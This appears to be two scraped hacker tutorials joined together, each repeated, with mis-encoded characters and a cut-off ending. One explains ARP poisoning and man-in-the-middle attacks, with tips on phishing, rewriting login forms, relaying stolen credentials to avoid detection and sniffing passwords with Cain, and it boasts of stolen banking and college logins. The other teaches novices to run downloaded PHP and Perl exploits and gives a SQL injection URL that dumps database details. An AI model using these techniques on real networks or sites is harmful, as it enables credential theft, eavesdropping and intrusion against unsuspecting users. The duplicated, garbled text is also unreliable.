Basics ARP Poison routing
Introduction
This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.
Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.
Address Resolution Protocol:
The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses the ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:
The address resolution protocol works on a stateless broadcast request/single reply communication model. This means when one computer wants to know the address of another; it will broadcast a request for the address across the whole network in the form of What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B. The computer that has the IP address of 123.123.123.123 would then send a directed reply, NOT broadcast, saying 90:F5:63:CA:BB:32 has 123.123.123.123. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or MAC being used, the cache is updated to reflect this new info. The MAC/IP mapping is then used to route traffic around the network.
ARP Poison Routing (APR)
Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway.
The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be setup with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:
Figure 1: 1-way APR
2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:
Figure 2: 2-way APR
Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.
DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, HTTP form data, and hashes such as AIM and Yahoo messenger and SQL. You can even listen in on NetBios sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes
One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network; because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then repackaged and sent all the way down the OSI model again, your computer can not handle packet routing as efficiently as a dedicated hardware router.
This costs a great amount of time and CPU cycles and slows down the flow of traffic that may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going thru your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR works on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.
Man In The Middle (Mitm) Attacks
Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.
For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need to have a filter that disassembles the packet to get to the layer 4 data and above, then scan that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info, or you can use a filter to capture an entire NetBios, Telnet, or VoIP session to record conversations and gather potentially sensitive information. Sometimes it is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hopes that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.
Because mitm attacks are built on the back of an APR attack, then all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.
Phishing
Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure in tact), and any stylesheets, javascripts, or embedded objects, then just make a few small changes to the code. Make sure to change all relative directories to absolute URLs when you do this! If you don’t, a form may not direct to the right page or produce a 404 error or an image may not display right and will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective.
The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a tag, so that when the victim clicks the login button, the data will be sent to a site of your choice where you can log the information. This method may be slightly easier to execute, but it will increase the risk of unintentional DoSing due to the processing power required for the filter.
No matter what method you choose to use, it is almost always a good idea to take the login info that you received from your fake site and pass it on to the real site to log the user on. This makes your attack more hidden and more difficult to detect. When doing this, make sure to catch errors coming back from the real site in case the user entered an invalid password or username. Then pass this information back to the user. This can be done easily and is no big deal to implement, but failing to do so may raise suspicion and may get you caught.
APR with Cain
Most people think of Cain as a simple password hash cracker, but it is actually much more. It is a very powerful network analyzer and password recovery tool as well as a cracker. It can dump protected storages, sniff network connections, enumerate hosts and users as well as network shares, and can even remotely install the backdoor program Abel. Now, on to the good stuff! I will show you a basic password sniffing mitm attack, but first, I assume you have Cain configured properly for your network card. If not, click the “Configure” menu option and read the help files.
Start up Cain and look at the icons in along the top, just under the menu. The 2 icons we will be concerned with here are the nuclear symbol (the APR icon) and the small circuit board with a red arrow (the sniffer icon). If you are not sure which icons I am talking about, hover your mouse over them and find the icons for “Start/Stop Sniffer” and “Start/Stop APR”. Click the sniffer icon to start the sniffer. Now go to the sniffer tab. The table shown in this tab provides you with information about computers currently on your network and should be blank. If not, clear it by right clicking and selecting “remove all”. The most useful columns right now are the first 4: IP Address, MAC Address, OUI Fingerprint, and Host Name.
These should be pretty self explanatory with the exception of the OUI Fingerprint column. When a MAC address is coded into a piece of network hardware, part of the address is used to define the particular computer (like a serial number) and part is used to define the vendor that makes the hardware. Cain has a database of vendors that it checks the MAC address against to discover who made the hardware of that particular host. This is what is contained in the OUI Fingerprint column.
Once the sniffer is started, we need to populate the sniffer tab with host info. Click the “+” button to gather a list of all computers on the current network. If you have Ethereal, you can start that up with “arp” in the filter and watch Cain send out consecutive ARP requests for every IP in your subdomain and watch all the computers respond, freely giving away information about themselves. Once we have a list of possible targets, we need to setup an APR attack. Click on the “Start/Stop APR” icon to start the APR poisoner, then click the “APR” tab at the bottom of the “Sniffer” tab window. There are 2 tables in this tab: the top one is hosts on the LAN that you can directly affect, the bottom table is for computers on the WAN, which, depending on the border router’s settings, may or may not be vulnerable to APR. This list is populated as hosts are discovered thru analyzing packets.
Select the LAN table, and click the “+” icon again. Now select 2 hosts to insert yourself between. After that’s done, sit back and watch the packets roll in. Check the “Passwords” tab on the bottom for various passwords, or the branches under the “APR” symbol on the main APR tab to get HTTPS certificates and other valuable information. The APR-DNS branch can be used in phishing and in redirecting traffic from a website. Well, that’s it. That’s all there is to spying on people’s network traffic when you have access to a computer on the network, which is quite often if you go war-driving behind main street, picking up all the “insekure” business wi-fis
Conclusions
On large or sensitive networks, APR and Mitm can be a very effective way of getting valuable information thru many means, including packet filters and sniffers, phishing, and traffic rerouting. Some of the overall limitations of ARP poisoning are that it cannot cross routers unless they are set up as a single autonomous unit (AU) and are contained in the same subnet. ARP poisoning can be easily thwarted if static caches are being used. Static caches prevent host caches from being updated remotely via the ARP protocol. Some of the interesting things I have actually been able to get from APR and Mitm include:
Links, References, and Tools
- Cain
- Ettercap
- Ethereal
- ARPoison
- Dsniff
- Parasite
- WinARPSpoofer
- http://en.wikipedia.org/wiki/ARP_spoofing
- http://www.grc.com/nat/arp.htm
This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.
Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.
Address Resolution Protocol:
The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses the ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:
1. ARP – What MAC has this IP address?If you are trying to contact a computer on another network (ie, over the internet) then ARP is used to contact your border gateway and route packets to it. The gateway is then responsible for routing the packets to the desire network using IP addresses and various routing protocols instead of ARP. Once the packet has arrived at the correct network, the router that received it will then use ARP again to route the packet around the network to its final destination.
2. ARP Response – This MAC has this IP address.
3. RARP – What IP has this MAC address?
4. RARP Response – This IP has this MAC address.
The address resolution protocol works on a stateless broadcast request/single reply communication model. This means when one computer wants to know the address of another; it will broadcast a request for the address across the whole network in the form of What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B. The computer that has the IP address of 123.123.123.123 would then send a directed reply, NOT broadcast, saying 90:F5:63:CA:BB:32 has 123.123.123.123. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or MAC being used, the cache is updated to reflect this new info. The MAC/IP mapping is then used to route traffic around the network.
ARP Poison Routing (APR)
Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway.
The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be setup with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:
Figure 1: 1-way APR
2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:
Figure 2: 2-way APR
Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.
DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, HTTP form data, and hashes such as AIM and Yahoo messenger and SQL. You can even listen in on NetBios sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes
One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network; because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then repackaged and sent all the way down the OSI model again, your computer can not handle packet routing as efficiently as a dedicated hardware router.
This costs a great amount of time and CPU cycles and slows down the flow of traffic that may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going thru your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR works on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.
Man In The Middle (Mitm) Attacks
Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.
For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need to have a filter that disassembles the packet to get to the layer 4 data and above, then scan that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info, or you can use a filter to capture an entire NetBios, Telnet, or VoIP session to record conversations and gather potentially sensitive information. Sometimes it is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hopes that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.
Because mitm attacks are built on the back of an APR attack, then all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.
Phishing
Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure in tact), and any stylesheets, javascripts, or embedded objects, then just make a few small changes to the code. Make sure to change all relative directories to absolute URLs when you do this! If you don’t, a form may not direct to the right page or produce a 404 error or an image may not display right and will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective.
The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a tag, so that when the victim clicks the login button, the data will be sent to a site of your choice where you can log the information. This method may be slightly easier to execute, but it will increase the risk of unintentional DoSing due to the processing power required for the filter.
No matter what method you choose to use, it is almost always a good idea to take the login info that you received from your fake site and pass it on to the real site to log the user on. This makes your attack more hidden and more difficult to detect. When doing this, make sure to catch errors coming back from the real site in case the user entered an invalid password or username. Then pass this information back to the user. This can be done easily and is no big deal to implement, but failing to do so may raise suspicion and may get you caught.
APR with Cain
Most people think of Cain as a simple password hash cracker, but it is actually much more. It is a very powerful network analyzer and password recovery tool as well as a cracker. It can dump protected storages, sniff network connections, enumerate hosts and users as well as network shares, and can even remotely install the backdoor program Abel. Now, on to the good stuff! I will show you a basic password sniffing mitm attack, but first, I assume you have Cain configured properly for your network card. If not, click the “Configure” menu option and read the help files.
Start up Cain and look at the icons in along the top, just under the menu. The 2 icons we will be concerned with here are the nuclear symbol (the APR icon) and the small circuit board with a red arrow (the sniffer icon). If you are not sure which icons I am talking about, hover your mouse over them and find the icons for “Start/Stop Sniffer” and “Start/Stop APR”. Click the sniffer icon to start the sniffer. Now go to the sniffer tab. The table shown in this tab provides you with information about computers currently on your network and should be blank. If not, clear it by right clicking and selecting “remove all”. The most useful columns right now are the first 4: IP Address, MAC Address, OUI Fingerprint, and Host Name.
These should be pretty self explanatory with the exception of the OUI Fingerprint column. When a MAC address is coded into a piece of network hardware, part of the address is used to define the particular computer (like a serial number) and part is used to define the vendor that makes the hardware. Cain has a database of vendors that it checks the MAC address against to discover who made the hardware of that particular host. This is what is contained in the OUI Fingerprint column.
Once the sniffer is started, we need to populate the sniffer tab with host info. Click the “+” button to gather a list of all computers on the current network. If you have Ethereal, you can start that up with “arp” in the filter and watch Cain send out consecutive ARP requests for every IP in your subdomain and watch all the computers respond, freely giving away information about themselves. Once we have a list of possible targets, we need to setup an APR attack. Click on the “Start/Stop APR” icon to start the APR poisoner, then click the “APR” tab at the bottom of the “Sniffer” tab window. There are 2 tables in this tab: the top one is hosts on the LAN that you can directly affect, the bottom table is for computers on the WAN, which, depending on the border router’s settings, may or may not be vulnerable to APR. This list is populated as hosts are discovered thru analyzing packets.
Select the LAN table, and click the “+” icon again. Now select 2 hosts to insert yourself between. After that’s done, sit back and watch the packets roll in. Check the “Passwords” tab on the bottom for various passwords, or the branches under the “APR” symbol on the main APR tab to get HTTPS certificates and other valuable information. The APR-DNS branch can be used in phishing and in redirecting traffic from a website. Well, that’s it. That’s all there is to spying on people’s network traffic when you have access to a computer on the network, which is quite often if you go war-driving behind main street, picking up all the “insekure” business wi-fis
Conclusions
On large or sensitive networks, APR and Mitm can be a very effective way of getting valuable information thru many means, including packet filters and sniffers, phishing, and traffic rerouting. Some of the overall limitations of ARP poisoning are that it cannot cross routers unless they are set up as a single autonomous unit (AU) and are contained in the same subnet. ARP poisoning can be easily thwarted if static caches are being used. Static caches prevent host caches from being updated remotely via the ARP protocol. Some of the interesting things I have actually been able to get from APR and Mitm include:
- Webmail and SMTP loginsThings I’ve learned from my exploits: SECURE YOUR Network! And DON’T do important things on a public network (library, school). You never know when Big Brother is watching
- FTP logins to servers running FTPD as root (w00t!)
- FTP logins to websites (pwnt)
- Admin logins to sites
- Student and teacher account logins to my college (I can change their schedules for next year :D)
- AIM convos/hashes and Telnet/SMB/SSH sessions
- Wardriving behind businesses to take over their networks
- Online banking login info and certificates (free moneys!)
Links, References, and Tools
- Cain
- Ettercap
- Ethereal
- ARPoison
- Dsniff
- Parasite
- WinARPSpoofer
- http://en.wikipedia.org/wiki/ARP_spoofing
- http://www.grc.com/nat/arp.htm
Exploiting Basics
There are mainly three different types of exploits that are used on the internet. PHP, Perl and Web Based attacks.
PHP and Perl attacks are run on the persons computer through an interpreter - a program that reads the code and runs the output. These are usually powered by an underlying SQL or XSS attack.
The other type of attack is a plain web based attack, usually a SQL injection or an XSS exploit with no PHP or Perl powered frontend. These are the easiest to do, but the hardest to figure out how to use as there is not a definitive way of executing them.
General Information
Operating Systems
The most widely used OS is Windows and to be honest I hate it. But I use it. But it is very hard to hack with as tools are not really created for it in mind. Because of that I recommend Linux as a hacking OS because everything just works. .
Oh, yeah, did I mention its free?
PHP
PHP (PHP: Hypertext Preprocessor) is a computer scripting language, originally designed for producing dynamic web pages. It is mainly used in server-side scripting, but can be used from a command line interface or in standalone graphical applications.
Yes, that's from Wikipedia. But its helpful and might be interesting.
But PHP is a very useful and powerful programming language which is used for diverse projects. Because its powerful yet simplistic its used for hacking. And, of course, its free.
How To Spot a PHP Exploit
A PHP exploit is always encased in tags.
Perl
Perl is a dynamic programming language created by Larry Wall and first released in 1987. Perl borrows features from a variety of other languages including C, shell scripting (sh), AWK, sed and Lisp. Perl was widely adopted for its strengths in text processing and lack of the arbitrary limitations of many scripting languages at the time.
Yes, thats from Wikipedia too. But Perl too is a powerful yet simplistic language, like PHP. And its free as well
How To Spot a Perl Exploit
They always start with
#!/usr/bin/perl
Executing Exploits:
Web Based:
These attacks differ hugely so the easiest thing to do is to read the NFO when using this kind of attack.
They usually come in the format
http://www.xxx.org/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
The example is a SQL injection but XSS attacks looks very similar. All text after the view.php? is the sploit. The exploit occurs in the way that the PHP handles the information being sent by the HTML.
To use these you just paste everything from http://www.xxx.org/ into the browser address bar while on the vulnerable page of the website.
For example: I am on the forums of a website at www.somewebsite.org/forums/. I know the exploit is in the format above. But, I know that the venerable part of the site is in the /forums/ sub directory so I paste the exploit there:
www.somewebsite.org/forums/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
You can take this principle and apply it to XSS exploits as well.
To be a script you do not need to know SQL, but if you want to develop your own exploits it helps a great deal. Look here for more information: http://www.w3schools.com/sql/default.asp
PHP on Windows:
To run PHP on Windows, you need the PHP software. The is open source so free to download.
http://www.php.net/downloads.php
Download the latest version of the Windows binary installer and the zipped folder.
Run the installer, install it into C:PHP, choose not to configure a web server. Next, open the zip, extract everything into the same folder. Rename php.exe to php2.exe or php.exe.bak. Now copy the php.exe from the C:PHPCLI folder to C:PHP.
Right-click My Computer and pick properties. Click the Advanced tab, then the Environment Variables at the bottom. In the second list-box youâ??ll see a line for PATH. Double-click it and add to the end of the existing line â??;C:PHPâ?? This should give you something like:
Code:
C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem;
C:Program FilesCommand;C:PHP
Click OK.
Now open a Command Prompt and type the following lines:
ASSOC .php=PHPScript
FTYPE PHPScript="C:PHPPHP.EXE" "%1" %*
You can now just type a PHP script name to run it like an EXE in Command Prompt. No need to type PHP first. For example:
Code:
C:>phpscript.php
Now you have got PHP environment set up save the exploit to your computer as a .php file. The easiest way to do this is to paste everything from the into notepad. Then File -> Save as and save as type All Files. then in the file name type exploit.php.
Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
The text after the // are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the '....' to the information relevant to the site that you are exploiting.
Finally you can run it on the command prompt but navigating to the directory that you saved the exploit.php file in.
C:> cd C:/your/dir/goes/here
and then run the exploit
C:/your/dir/goes/here> exploit.php
The output of your exploit, such as passwords, will be shown in the command prompt.
Your done
PHP on Linux (Debian/Ubuntu):
Firstly, become root. Then install PHP.
apt-get install php5
Then save the exploit as exploit.php to your home directory. The exploit is everything within .
Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
The text after the // are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the '....' to the information relevant to the site that you are exploiting.
Finally, run the php file.
php exploit.php
The output of your exploit, such as passwords, will be shown in the command prompt.
Your done
Perl on Windows:
Perl is very similar to PHP in the way that its run, but thanks to good software, it is a lot easier to execute.
Download Strawberry Perl from: http://strawberryperl.com/
Just install and you are able to run perl files by executing on the command line
perl exploit.pl
Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; #Username is needed
$outfile = "./cute_log.txt2; # Log file
The text after the # are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the "...." to the information relevant to the site that you are exploiting.
Finally run the exploit by typing into the command line:
perl exploit.pl
The output of your exploit, such as passwords, will be shown in the command prompt below.
Your done
Perl on Linux (Debian/Ubuntu):
Become root and install perl:
apt-get install perl
You are then able to run perl files by executing:
perl exploit.pl
Save the perl exploit to your home directory as exploit.pl.
Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
Code:
$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; #Username is needed
$outfile = "./cute_log.txt2; # Log file
The text after the # are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the "...." to the information relevant to the site that you are exploiting.
Finally run the exploit by typing:
perl exploit.pl
The output of your exploit, such as passwords, will be shown in the command prompt below.
PHP and Perl attacks are run on the persons computer through an interpreter - a program that reads the code and runs the output. These are usually powered by an underlying SQL or XSS attack.
The other type of attack is a plain web based attack, usually a SQL injection or an XSS exploit with no PHP or Perl powered frontend. These are the easiest to do, but the hardest to figure out how to use as there is not a definitive way of executing them.
General Information
Operating Systems
The most widely used OS is Windows and to be honest I hate it. But I use it. But it is very hard to hack with as tools are not really created for it in mind. Because of that I recommend Linux as a hacking OS because everything just works. .
Oh, yeah, did I mention its free?
PHP
PHP (PHP: Hypertext Preprocessor) is a computer scripting language, originally designed for producing dynamic web pages. It is mainly used in server-side scripting, but can be used from a command line interface or in standalone graphical applications.
Yes, that's from Wikipedia. But its helpful and might be interesting.
But PHP is a very useful and powerful programming language which is used for diverse projects. Because its powerful yet simplistic its used for hacking. And, of course, its free.
How To Spot a PHP Exploit
A PHP exploit is always encased in tags.
Perl
Perl is a dynamic programming language created by Larry Wall and first released in 1987. Perl borrows features from a variety of other languages including C, shell scripting (sh), AWK, sed and Lisp. Perl was widely adopted for its strengths in text processing and lack of the arbitrary limitations of many scripting languages at the time.
Yes, thats from Wikipedia too. But Perl too is a powerful yet simplistic language, like PHP. And its free as well
How To Spot a Perl Exploit
They always start with
#!/usr/bin/perl
Executing Exploits:
Web Based:
These attacks differ hugely so the easiest thing to do is to read the NFO when using this kind of attack.
They usually come in the format
http://www.xxx.org/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
The example is a SQL injection but XSS attacks looks very similar. All text after the view.php? is the sploit. The exploit occurs in the way that the PHP handles the information being sent by the HTML.
To use these you just paste everything from http://www.xxx.org/ into the browser address bar while on the vulnerable page of the website.
For example: I am on the forums of a website at www.somewebsite.org/forums/. I know the exploit is in the format above. But, I know that the venerable part of the site is in the /forums/ sub directory so I paste the exploit there:
www.somewebsite.org/forums/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
You can take this principle and apply it to XSS exploits as well.
To be a script you do not need to know SQL, but if you want to develop your own exploits it helps a great deal. Look here for more information: http://www.w3schools.com/sql/default.asp
PHP on Windows:
To run PHP on Windows, you need the PHP software. The is open source so free to download.
http://www.php.net/downloads.php
Download the latest version of the Windows binary installer and the zipped folder.
Run the installer, install it into C:PHP, choose not to configure a web server. Next, open the zip, extract everything into the same folder. Rename php.exe to php2.exe or php.exe.bak. Now copy the php.exe from the C:PHPCLI folder to C:PHP.
Right-click My Computer and pick properties. Click the Advanced tab, then the Environment Variables at the bottom. In the second list-box youâ??ll see a line for PATH. Double-click it and add to the end of the existing line â??;C:PHPâ?? This should give you something like:
Code:
C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem;
C:Program FilesCommand;C:PHP
Click OK.
Now open a Command Prompt and type the following lines:
ASSOC .php=PHPScript
FTYPE PHPScript="C:PHPPHP.EXE" "%1" %*
You can now just type a PHP script name to run it like an EXE in Command Prompt. No need to type PHP first. For example:
Code:
C:>phpscript.php
Now you have got PHP environment set up save the exploit to your computer as a .php file. The easiest way to do this is to paste everything from the into notepad. Then File -> Save as and save as type All Files. then in the file name type exploit.php.
Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
The text after the // are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the '....' to the information relevant to the site that you are exploiting.
Finally you can run it on the command prompt but navigating to the directory that you saved the exploit.php file in.
C:> cd C:/your/dir/goes/here
and then run the exploit
C:/your/dir/goes/here> exploit.php
The output of your exploit, such as passwords, will be shown in the command prompt.
Your done
PHP on Linux (Debian/Ubuntu):
Firstly, become root. Then install PHP.
apt-get install php5
Then save the exploit as exploit.php to your home directory. The exploit is everything within .
Read through the php file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
$target = 'http://localhost/cutenews.1.4.5/search.php';
$username = 'waraxe'; // Username is needed
$outfile = './cute_log.txt';// Log file
The text after the // are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the '....' to the information relevant to the site that you are exploiting.
Finally, run the php file.
php exploit.php
The output of your exploit, such as passwords, will be shown in the command prompt.
Your done
Perl on Windows:
Perl is very similar to PHP in the way that its run, but thanks to good software, it is a lot easier to execute.
Download Strawberry Perl from: http://strawberryperl.com/
Just install and you are able to run perl files by executing on the command line
perl exploit.pl
Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
$target = "http://localhost/cutenews.1.4.5/search.php";
